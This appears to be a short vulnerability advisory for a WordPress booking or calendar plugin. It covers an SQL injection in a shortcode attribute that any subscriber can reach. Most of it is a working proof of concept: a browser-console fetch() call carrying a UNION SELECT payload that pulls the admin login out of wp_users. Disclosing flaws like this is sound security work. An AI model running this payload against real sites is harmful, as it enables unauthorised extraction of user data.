The plugin does not validate and escape one of its shortcode attributes before using it in a SQL statement, which could allow any authenticated users, such as subscriber to perform SQL Injection attacks.
Note: A Calendar is needed (if there is not one already).
Run the below command in the developer console of the web browser while being on the blog as a subscriber
fetch('/wp-admin/admin-ajax.php', {
method: 'POST',
headers: new Headers({
'Content-Type': 'application/x-www-form-urlencoded',
}),
body: 'action=parse-media-shortcode&shortcode=[dopbs id=\'1\' lang=\'en UNION SELECT 100000, CONCAT("DAY_MONDAY"), "", "", user_login COLLATE utf8mb4_unicode_520_ci,"frontend" FROM wp_users WHERE wp_users.ID = 1 --\']'
}).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));
The login of the first user (ie the admin) will be displayed in the calendar data json, within the text[names] attribute.